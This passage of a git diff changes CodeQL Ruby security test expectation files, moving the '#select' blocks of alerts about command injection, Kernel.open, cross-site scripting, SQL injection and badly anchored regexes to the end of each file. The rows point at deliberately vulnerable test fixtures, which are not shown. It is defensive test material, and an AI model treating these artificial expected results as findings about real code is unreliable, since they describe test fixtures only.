impl/miss-anchor.rb:15:47:15:50 | name | semmle.label | name | subpaths +#select +| impl/miss-anchor.rb:3:39:3:42 | name | impl/miss-anchor.rb:2:12:2:15 | name | impl/miss-anchor.rb:3:39:3:42 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:2:12:2:15 | name | library input | impl/miss-anchor.rb:3:39:3:89 | ... !~ ... | checked | impl/miss-anchor.rb:3:48:3:88 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | +| impl/miss-anchor.rb:7:43:7:46 | name | impl/miss-anchor.rb:6:12:6:15 | name | impl/miss-anchor.rb:7:43:7:46 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:6:12:6:15 | name | library input | impl/miss-anchor.rb:7:43:7:93 | ... !~ ... | checked | impl/miss-anchor.rb:7:52:7:92 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | +| impl/miss-anchor.rb:15:47:15:50 | name | impl/miss-anchor.rb:14:12:14:15 | name | impl/miss-anchor.rb:15:47:15:50 | name | This value depends on $@, and is $@ against a $@. | impl/miss-anchor.rb:14:12:14:15 | name | library input | impl/miss-anchor.rb:15:47:15:97 | ... !~ ... | checked | impl/miss-anchor.rb:15:56:15:96 | ^[A-Za-z0-9\\+\\-_]+(\\/[A-Za-z0-9\\+\\-_]+)*$ | badly anchored regular expression | diff --git a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected index 25fd9e3e37a3..67e618a3a1fd 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected +++ b/ruby/ql/test/query-tests/security/cwe-078/KernelOpen/KernelOpen.expected @@ -1,14 +1,3 @@ -#select -| KernelOpen.rb:4:10:4:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:4:10:4:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:5:13:5:16 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:5:13:5:16 | file | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:6:14:6:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:6:14:6:17 | file | This call to IO.write depends on a $@. Consider replacing it with File.write. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:7:16:7:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:7:16:7:19 | file | This call to IO.binread depends on a $@. Consider replacing it with File.binread. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:8:17:8:20 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:8:17:8:20 | file | This call to IO.binwrite depends on a $@. Consider replacing it with File.binwrite. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:9:16:9:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:9:16:9:19 | file | This call to IO.foreach depends on a $@. Consider replacing it with File.foreach. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:10:18:10:21 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:10:18:10:21 | file | This call to IO.readlines depends on a $@. Consider replacing it with File.readlines. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:11:14:11:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:11:14:11:17 | file | This call to URI.open depends on a $@. Consider replacing it with URI().open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:13:13:13:31 | call to join | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:13:13:13:31 | call to join | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | -| KernelOpen.rb:26:10:26:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:26:10:26:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | edges | KernelOpen.rb:3:5:3:8 | file | KernelOpen.rb:4:10:4:13 | file | provenance | | | KernelOpen.rb:3:5:3:8 | file | KernelOpen.rb:5:13:5:16 | file | provenance | | @@ -39,3 +28,14 @@ nodes | KernelOpen.rb:13:23:13:26 | file | semmle.label | file | | KernelOpen.rb:26:10:26:13 | file | semmle.label | file | subpaths +#select +| KernelOpen.rb:4:10:4:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:4:10:4:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:5:13:5:16 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:5:13:5:16 | file | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:6:14:6:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:6:14:6:17 | file | This call to IO.write depends on a $@. Consider replacing it with File.write. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:7:16:7:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:7:16:7:19 | file | This call to IO.binread depends on a $@. Consider replacing it with File.binread. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:8:17:8:20 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:8:17:8:20 | file | This call to IO.binwrite depends on a $@. Consider replacing it with File.binwrite. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:9:16:9:19 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:9:16:9:19 | file | This call to IO.foreach depends on a $@. Consider replacing it with File.foreach. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:10:18:10:21 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:10:18:10:21 | file | This call to IO.readlines depends on a $@. Consider replacing it with File.readlines. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:11:14:11:17 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:11:14:11:17 | file | This call to URI.open depends on a $@. Consider replacing it with URI().open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:13:13:13:31 | call to join | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:13:13:13:31 | call to join | This call to IO.read depends on a $@. Consider replacing it with File.read. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | +| KernelOpen.rb:26:10:26:13 | file | KernelOpen.rb:3:12:3:17 | call to params | KernelOpen.rb:26:10:26:13 | file | This call to Kernel.open depends on a $@. Consider replacing it with File.open. | KernelOpen.rb:3:12:3:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected index adefbb03c645..622777da09ea 100644 --- a/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-078/UnsafeShellCommandConstruction/UnsafeShellCommandConstruction.expected @@ -1,19 +1,3 @@ -#select -| impl/sub/notImported.rb:3:14:3:28 | "cat #{...}" | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/notImported.rb:2:12:2:17 | target | library input | impl/sub/notImported.rb:3:5:3:34 | call to popen | shell command | -| impl/sub/other2.rb:3:14:3:28 | "cat #{...}" | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other2.rb:2:12:2:17 | target | library input | impl/sub/other2.rb:3:5:3:34 | call to popen | shell command | -| impl/sub/other.rb:3:14:3:28 | "cat #{...}" | impl/sub/other.rb:2:12:2:17 | target | impl/sub/other.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other.rb:2:12:2:17 | target | library input | impl/sub/other.rb:3:5:3:34 | call to popen | shell command | -| impl/unsafeShell.rb:3:14:3:28 | "cat #{...}" | impl/unsafeShell.rb:2:12:2:17 | target | impl/unsafeShell.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:2:12:2:17 | target | library input | impl/unsafeShell.rb:3:5:3:34 | call to popen | shell command | -| impl/unsafeShell.rb:7:14:7:33 | call to sprintf | impl/unsafeShell.rb:6:12:6:12 | x | impl/unsafeShell.rb:7:32:7:32 | x | This formatted string which depends on $@ is later used in a $@. | impl/unsafeShell.rb:6:12:6:12 | x | library input | impl/unsafeShell.rb:8:5:8:25 | call to popen | shell command | -| impl/unsafeShell.rb:20:14:20:42 | "which #{...}" | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | impl/unsafeShell.rb:20:21:20:41 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | library input | impl/unsafeShell.rb:20:5:20:48 | call to popen | shell command | -| impl/unsafeShell.rb:26:14:26:31 | "cat #{...}" | impl/unsafeShell.rb:23:15:23:23 | file_path | impl/unsafeShell.rb:26:19:26:30 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:23:15:23:23 | file_path | library input | impl/unsafeShell.rb:26:5:26:37 | call to popen | shell command | -| impl/unsafeShell.rb:34:14:34:28 | "cat #{...}" | impl/unsafeShell.rb:33:12:33:17 | target | impl/unsafeShell.rb:34:19:34:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:33:12:33:17 | target | library input | impl/unsafeShell.rb:34:5:34:34 | call to popen | shell command | -| impl/unsafeShell.rb:38:14:38:23 | "cat #{...}" | impl/unsafeShell.rb:37:10:37:10 | x | impl/unsafeShell.rb:38:19:38:22 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:37:10:37:10 | x | library input | impl/unsafeShell.rb:38:5:38:29 | call to popen | shell command | -| impl/unsafeShell.rb:48:14:48:28 | "cat #{...}" | impl/unsafeShell.rb:47:16:47:21 | target | impl/unsafeShell.rb:48:19:48:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:47:16:47:21 | target | library input | impl/unsafeShell.rb:48:5:48:34 | call to popen | shell command | -| impl/unsafeShell.rb:52:14:52:24 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:52:14:52:14 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:52:5:52:30 | call to popen | shell command | -| impl/unsafeShell.rb:54:14:54:40 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:54:29:54:29 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:54:5:54:46 | call to popen | shell command | -| impl/unsafeShell.rb:58:14:58:23 | ... + ... | impl/unsafeShell.rb:57:21:57:21 | x | impl/unsafeShell.rb:58:23:58:23 | x | This string concatenation which depends on $@ is later used in a $@. | impl/unsafeShell.rb:57:21:57:21 | x | library input | impl/unsafeShell.rb:58:5:58:29 | call to popen | shell command | -| impl/unsafeShell.rb:64:14:64:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:64:14:64:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:64:5:64:32 | call to popen | shell command | -| impl/unsafeShell.rb:68:14:68:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:68:14:68:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:68:5:68:32 | call to popen | shell command | edges | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | provenance | | | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | provenance | | @@ -64,3 +48,19 @@ nodes | impl/unsafeShell.rb:64:14:64:16 | arr | semmle.label | arr | | impl/unsafeShell.rb:68:14:68:16 | arr | semmle.label | arr | subpaths +#select +| impl/sub/notImported.rb:3:14:3:28 | "cat #{...}" | impl/sub/notImported.rb:2:12:2:17 | target | impl/sub/notImported.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/notImported.rb:2:12:2:17 | target | library input | impl/sub/notImported.rb:3:5:3:34 | call to popen | shell command | +| impl/sub/other2.rb:3:14:3:28 | "cat #{...}" | impl/sub/other2.rb:2:12:2:17 | target | impl/sub/other2.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other2.rb:2:12:2:17 | target | library input | impl/sub/other2.rb:3:5:3:34 | call to popen | shell command | +| impl/sub/other.rb:3:14:3:28 | "cat #{...}" | impl/sub/other.rb:2:12:2:17 | target | impl/sub/other.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/sub/other.rb:2:12:2:17 | target | library input | impl/sub/other.rb:3:5:3:34 | call to popen | shell command | +| impl/unsafeShell.rb:3:14:3:28 | "cat #{...}" | impl/unsafeShell.rb:2:12:2:17 | target | impl/unsafeShell.rb:3:19:3:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:2:12:2:17 | target | library input | impl/unsafeShell.rb:3:5:3:34 | call to popen | shell command | +| impl/unsafeShell.rb:7:14:7:33 | call to sprintf | impl/unsafeShell.rb:6:12:6:12 | x | impl/unsafeShell.rb:7:32:7:32 | x | This formatted string which depends on $@ is later used in a $@. | impl/unsafeShell.rb:6:12:6:12 | x | library input | impl/unsafeShell.rb:8:5:8:25 | call to popen | shell command | +| impl/unsafeShell.rb:20:14:20:42 | "which #{...}" | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | impl/unsafeShell.rb:20:21:20:41 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:15:47:15:64 | innocent_file_path | library input | impl/unsafeShell.rb:20:5:20:48 | call to popen | shell command | +| impl/unsafeShell.rb:26:14:26:31 | "cat #{...}" | impl/unsafeShell.rb:23:15:23:23 | file_path | impl/unsafeShell.rb:26:19:26:30 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:23:15:23:23 | file_path | library input | impl/unsafeShell.rb:26:5:26:37 | call to popen | shell command | +| impl/unsafeShell.rb:34:14:34:28 | "cat #{...}" | impl/unsafeShell.rb:33:12:33:17 | target | impl/unsafeShell.rb:34:19:34:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:33:12:33:17 | target | library input | impl/unsafeShell.rb:34:5:34:34 | call to popen | shell command | +| impl/unsafeShell.rb:38:14:38:23 | "cat #{...}" | impl/unsafeShell.rb:37:10:37:10 | x | impl/unsafeShell.rb:38:19:38:22 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:37:10:37:10 | x | library input | impl/unsafeShell.rb:38:5:38:29 | call to popen | shell command | +| impl/unsafeShell.rb:48:14:48:28 | "cat #{...}" | impl/unsafeShell.rb:47:16:47:21 | target | impl/unsafeShell.rb:48:19:48:27 | #{...} | This string construction which depends on $@ is later used in a $@. | impl/unsafeShell.rb:47:16:47:21 | target | library input | impl/unsafeShell.rb:48:5:48:34 | call to popen | shell command | +| impl/unsafeShell.rb:52:14:52:24 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:52:14:52:14 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:52:5:52:30 | call to popen | shell command | +| impl/unsafeShell.rb:54:14:54:40 | call to join | impl/unsafeShell.rb:51:17:51:17 | x | impl/unsafeShell.rb:54:29:54:29 | x | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:51:17:51:17 | x | library input | impl/unsafeShell.rb:54:5:54:46 | call to popen | shell command | +| impl/unsafeShell.rb:58:14:58:23 | ... + ... | impl/unsafeShell.rb:57:21:57:21 | x | impl/unsafeShell.rb:58:23:58:23 | x | This string concatenation which depends on $@ is later used in a $@. | impl/unsafeShell.rb:57:21:57:21 | x | library input | impl/unsafeShell.rb:58:5:58:29 | call to popen | shell command | +| impl/unsafeShell.rb:64:14:64:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:64:14:64:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:64:5:64:32 | call to popen | shell command | +| impl/unsafeShell.rb:68:14:68:26 | call to join | impl/unsafeShell.rb:61:20:61:20 | x | impl/unsafeShell.rb:68:14:68:16 | arr | This array which depends on $@ is later used in a $@. | impl/unsafeShell.rb:61:20:61:20 | x | library input | impl/unsafeShell.rb:68:5:68:32 | call to popen | shell command | diff --git a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected index 3b304c94586e..599f29e806c9 100644 --- a/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected +++ b/ruby/ql/test/query-tests/security/cwe-079/UnsafeHtmlConstruction.expected @@ -1,8 +1,3 @@ -#select -| lib/unsafeHtml.rb:3:10:3:16 | #{...} | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:2:31:2:34 | name | library input | lib/unsafeHtml.rb:3:5:3:22 | "

    #{...}

    " | cross-site scripting | -| lib/unsafeHtml.rb:11:13:11:19 | #{...} | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:9:27:9:30 | name | library input | lib/unsafeHtml.rb:13:5:13:5 | h | cross-site scripting | -| lib/unsafeHtml.rb:17:28:17:31 | name | lib/unsafeHtml.rb:16:19:16:22 | name | lib/unsafeHtml.rb:17:28:17:31 | name | This string format which depends on $@ might later allow $@. | lib/unsafeHtml.rb:16:19:16:22 | name | library input | lib/unsafeHtml.rb:17:5:17:32 | call to sprintf | cross-site scripting | -| lib/unsafeHtml.rb:24:10:24:16 | #{...} | lib/unsafeHtml.rb:23:32:23:35 | name | lib/unsafeHtml.rb:24:10:24:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:23:32:23:35 | name | library input | lib/unsafeHtml.rb:24:5:24:22 | "

    #{...}

    " | cross-site scripting | edges | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | provenance | | | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | provenance | | @@ -18,3 +13,8 @@ nodes | lib/unsafeHtml.rb:23:32:23:35 | name | semmle.label | name | | lib/unsafeHtml.rb:24:10:24:16 | #{...} | semmle.label | #{...} | subpaths +#select +| lib/unsafeHtml.rb:3:10:3:16 | #{...} | lib/unsafeHtml.rb:2:31:2:34 | name | lib/unsafeHtml.rb:3:10:3:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:2:31:2:34 | name | library input | lib/unsafeHtml.rb:3:5:3:22 | "

    #{...}

    " | cross-site scripting | +| lib/unsafeHtml.rb:11:13:11:19 | #{...} | lib/unsafeHtml.rb:9:27:9:30 | name | lib/unsafeHtml.rb:11:13:11:19 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:9:27:9:30 | name | library input | lib/unsafeHtml.rb:13:5:13:5 | h | cross-site scripting | +| lib/unsafeHtml.rb:17:28:17:31 | name | lib/unsafeHtml.rb:16:19:16:22 | name | lib/unsafeHtml.rb:17:28:17:31 | name | This string format which depends on $@ might later allow $@. | lib/unsafeHtml.rb:16:19:16:22 | name | library input | lib/unsafeHtml.rb:17:5:17:32 | call to sprintf | cross-site scripting | +| lib/unsafeHtml.rb:24:10:24:16 | #{...} | lib/unsafeHtml.rb:23:32:23:35 | name | lib/unsafeHtml.rb:24:10:24:16 | #{...} | This string interpolation which depends on $@ might later allow $@. | lib/unsafeHtml.rb:23:32:23:35 | name | library input | lib/unsafeHtml.rb:24:5:24:22 | "

    #{...}

    " | cross-site scripting | diff --git a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected index f1c2646afce8..069cb34810fc 100644 --- a/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-089/SqlInjection.expected @@ -1,52 +1,3 @@ -#select -| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:10:33:10:67 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | -| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | ActiveRecordInjection.rb:77:38:77:43 | call to params | ActiveRecordInjection.rb:12:31:12:65 | "name='#{...}' and pass='#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:38:77:43 | call to params | user-provided value | -| ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | ActiveRecordInjection.rb:77:23:77:28 | call to params | ActiveRecordInjection.rb:16:13:16:26 | "name=#{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:77:23:77:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:30:16:30:24 | condition | ActiveRecordInjection.rb:174:21:174:26 | call to params | ActiveRecordInjection.rb:30:16:30:24 | condition | This SQL query depends on a $@. | ActiveRecordInjection.rb:174:21:174:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:42:30:42:44 | ...[...] | ActiveRecordInjection.rb:42:30:42:35 | call to params | ActiveRecordInjection.rb:42:30:42:44 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:42:30:42:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:46:18:46:32 | ...[...] | ActiveRecordInjection.rb:46:18:46:23 | call to params | ActiveRecordInjection.rb:46:18:46:32 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:46:18:46:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | ActiveRecordInjection.rb:50:29:50:34 | call to params | ActiveRecordInjection.rb:50:20:50:42 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:50:29:50:34 | call to params | user-provided value | -| ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | ActiveRecordInjection.rb:55:30:55:35 | call to params | ActiveRecordInjection.rb:55:21:55:43 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:55:30:55:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:59:21:59:45 | call to [] | ActiveRecordInjection.rb:59:31:59:36 | call to params | ActiveRecordInjection.rb:59:21:59:45 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:59:31:59:36 | call to params | user-provided value | -| ActiveRecordInjection.rb:64:22:64:46 | call to [] | ActiveRecordInjection.rb:64:32:64:37 | call to params | ActiveRecordInjection.rb:64:22:64:46 | call to [] | This SQL query depends on a $@. | ActiveRecordInjection.rb:64:32:64:37 | call to params | user-provided value | -| ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | ActiveRecordInjection.rb:69:21:69:26 | call to params | ActiveRecordInjection.rb:68:16:68:21 | <<-SQL | This SQL query depends on a $@. | ActiveRecordInjection.rb:69:21:69:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | ActiveRecordInjection.rb:75:34:75:39 | call to params | ActiveRecordInjection.rb:75:20:75:47 | "user.id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:75:34:75:39 | call to params | user-provided value | -| ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | ActiveRecordInjection.rb:81:41:81:46 | call to params | ActiveRecordInjection.rb:81:32:81:54 | "id = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:81:41:81:46 | call to params | user-provided value | -| ActiveRecordInjection.rb:86:23:86:35 | ...[...] | ActiveRecordInjection.rb:86:23:86:28 | call to params | ActiveRecordInjection.rb:86:23:86:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:86:23:86:28 | call to params | user-provided value | -| ActiveRecordInjection.rb:90:17:90:31 | ...[...] | ActiveRecordInjection.rb:90:17:90:22 | call to params | ActiveRecordInjection.rb:90:17:90:31 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:90:17:90:22 | call to params | user-provided value | -| ActiveRecordInjection.rb:91:19:91:33 | ...[...] | ActiveRecordInjection.rb:91:19:91:24 | call to params | ActiveRecordInjection.rb:91:19:91:33 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:91:19:91:24 | call to params | user-provided value | -| ActiveRecordInjection.rb:95:18:95:35 | ...[...] | ActiveRecordInjection.rb:95:18:95:23 | call to params | ActiveRecordInjection.rb:95:18:95:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:95:18:95:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:99:21:99:35 | ...[...] | ActiveRecordInjection.rb:99:21:99:26 | call to params | ActiveRecordInjection.rb:99:21:99:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:99:21:99:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | ActiveRecordInjection.rb:107:31:107:36 | call to params | ActiveRecordInjection.rb:107:20:107:55 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:107:31:107:36 | call to params | user-provided value | -| ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | ActiveRecordInjection.rb:111:30:111:35 | call to params | ActiveRecordInjection.rb:111:19:111:54 | "name = '#{...}'" | This SQL query depends on a $@. | ActiveRecordInjection.rb:111:30:111:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:113:18:113:35 | ...[...] | ActiveRecordInjection.rb:113:18:113:23 | call to params | ActiveRecordInjection.rb:113:18:113:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:113:18:113:23 | call to params | user-provided value | -| ActiveRecordInjection.rb:115:26:115:40 | ...[...] | ActiveRecordInjection.rb:115:26:115:31 | call to params | ActiveRecordInjection.rb:115:26:115:40 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:115:26:115:31 | call to params | user-provided value | -| ActiveRecordInjection.rb:116:28:116:42 | ...[...] | ActiveRecordInjection.rb:116:28:116:33 | call to params | ActiveRecordInjection.rb:116:28:116:42 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:116:28:116:33 | call to params | user-provided value | -| ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | ActiveRecordInjection.rb:117:30:117:35 | call to params | ActiveRecordInjection.rb:117:25:117:49 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:117:30:117:35 | call to params | user-provided value | -| ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | ActiveRecordInjection.rb:118:32:118:37 | call to params | ActiveRecordInjection.rb:118:27:118:51 | "b #{...}" | This SQL query depends on a $@. | ActiveRecordInjection.rb:118:32:118:37 | call to params | user-provided value | -| ActiveRecordInjection.rb:119:21:119:35 | ...[...] | ActiveRecordInjection.rb:119:21:119:26 | call to params | ActiveRecordInjection.rb:119:21:119:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:119:21:119:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:120:21:120:35 | ...[...] | ActiveRecordInjection.rb:120:21:120:26 | call to params | ActiveRecordInjection.rb:120:21:120:35 | ...[...] | This SQL query depends on a $@. | ActiveRecordInjection.rb:120:21:120:26 | call to params | user-provided value | -| ActiveRecordInjection.rb:121:20:121:34 | ...[...] | ActiveRecordInjection.rb:121:20:121:25 | call to params | ActiveRecordInjection.rb:121:20:121:34 | ...[...] | This SQL query depends on a $@. | 